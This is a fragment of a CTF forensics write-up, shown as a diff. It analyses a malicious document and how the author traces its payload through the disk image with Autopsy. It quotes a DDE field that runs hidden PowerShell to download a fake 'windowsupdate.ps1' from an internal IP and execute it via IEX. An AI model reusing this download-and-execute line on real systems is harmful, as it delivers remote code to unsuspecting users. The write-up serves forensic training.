connar/connar.github.io/content/ctfwriteups/hgm.md

 ddeService="cmd" ddeTopic="/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\&quot;http://172.21.20.96/windowsupdate.ps1\&quot;);IEX $e"
 ```

-If we try to access this IP to download the powershell script, we will not be able to retrieve it as it is no longer available.
+If we try to access this IP to download the powershell script, we will not be able to retrieve it as it is a local IP in which we don't have access to.
 But we remember that we have the whole filesystem, and thus we probably can retrieve the data of this `windowsupdate.ps1` from the powershell logs of the system.
 Searching in Autopsy for the IP, we get three hits back:

 ![alt text](/posts/writeups/training/idek2022/autopsy3.png)